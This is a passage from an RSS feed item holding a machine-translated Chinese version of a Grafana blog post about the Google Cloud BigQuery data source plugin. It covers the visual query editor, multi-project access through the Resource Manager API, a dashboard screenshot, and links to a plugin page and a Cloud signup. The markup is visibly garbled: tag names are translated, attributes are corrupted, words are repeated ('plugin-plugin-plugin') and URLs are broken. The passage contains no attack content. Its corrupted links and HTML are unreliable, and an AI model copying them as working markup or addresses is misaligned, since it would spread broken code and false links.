&lt;strong&gt;可视查询编辑器&lt;/strong&gt;：不想写SQL？不用担心。数据源还包括一个视觉查询编辑器，并支持基本聚合，过滤，分组，订购和原始查询预览。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;此外，插件与&#xA;&lt;a href =“ https://cloud.google.com/resource-manager/reference/rest/rest” target =“ _ black” rel =“ noopener noreferrer”&gt; Google Cloud Cloud Resource Manager API &lt;/a&gt;，使您可以从Grafana中的单个数据源中访问多个Google clough项目。这些功能和其他功能提供了一个可靠的解决方案，可以将BigQuery数据集成到您的Grafana可观察性工作流程中。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：1999px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/blog/bigquery-plugin-updates/bigquery-dashboard.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/博客/bigquery-plugin-updates/bigquery-dashboard.png” data-srcset =“/媒体/blog/bigquery-plugin-updates/bigquery-dashboard.png.png？w = 320 320w？ /Media/blog/bigquery-plugin-updates/bigquery-dashboard.png?w=750 750W，/media/Blog/bigquery-plugin-plugin-plugin-updates/bigquery-dashboard.png？ 1040W，/media/blog/bigquery-plugin-updates/bigquery-dashboard.png?w=1240 1240W，/media/Blog/bigquery-plugin-plugin-plugin-updates/bigquery-dashboard.png?w=1920 1920w“&#xA;data-sizes =“ auto” alt =“使用BigQuery Data源插件的Grafana仪表板的屏幕截图。” width =“ 1999”高度=“ 1027”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/博客/bigquery-plugin-updates/bigquery-dashboard.png”&#xA;alt =“使用BigQuery Data源插件的Grafana仪表板的屏幕截图。” width =“ 1999”高度=“ 1027”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;在&#xA;&lt;p&gt;要了解有关Grafana的Google Cloud BigQuery数据源的更多信息，包括如何安装，配置和提供数据源，请访问我们&#xA;&lt;a href =“/grafana/plugins/grafana-bigquery-datasource/？pg = blog＆plcmt = body-txt”&gt;插件目录页&lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;p&gt;您还可以了解有关Grafana数据源插件的广泛生态系统的更多信息&#xA;&lt;a href =“/blog/2025/02/25/data-sourcES-Visualization-and Apps-a-a-guide to-guide to-to-tospormizing-grafana/&gt;此博客文章&lt;/a&gt;&#xA;&lt;a href =“/go/webinar/unify-your-data-with-with-grafana-plugins-datadog-splunk-mongodb/“&gt; webinar &lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;p&gt; &lt;em&gt;&#xA;&lt;a href =“/products/cloud/？pg = blog＆plcmt = body-txt”&gt; grafana cloud &lt;/a&gt;是从指标，日志，痕迹，痕迹，仪表板等开始的最简单方法。我们有一个宽敞的永远的层次，并为每个用例都有计划。&#xA;&lt;a href =“//auth/ige-up/create-user/？pg = blog＆plcmt = body-txt”&gt;现在免费注册！&lt;/a&gt; &lt;/a&gt; &lt;/em&gt; &lt;/p&gt;</description>
      <pubDate>Wed, 18 Jun 2025 00:00:00 +0000</pubDate>
    </item>
  </channel>
</rss>